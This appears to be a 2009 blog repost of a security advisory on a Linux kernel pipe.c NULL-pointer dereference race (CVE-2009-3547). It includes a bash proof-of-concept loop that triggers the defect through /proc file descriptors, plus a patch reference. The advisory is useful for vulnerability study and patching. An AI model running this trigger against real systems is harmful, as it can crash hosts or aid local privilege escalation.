Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

by 날으는물고기 2009. 11. 4.

The Linux kernel is prone to a local privilege-escalation vulnerability caused by a NULL-pointer dereference.

Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.


Exploit:

The following proof of concept is available:

while : ; do
    { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
    PID=$!
    OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
          { read PID REST ; echo $PID; } )
    OUT="${OUT%% *}"
    DELAY=$((RANDOM * 1000 / 32768))
    usleep $((DELAY * 1000 + RANDOM % 1000 ))
    echo n > /proc/$OUT/fd/1    # Trigger defect
done


References:


Source: http://www.securityfocus.com


Patch code:
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/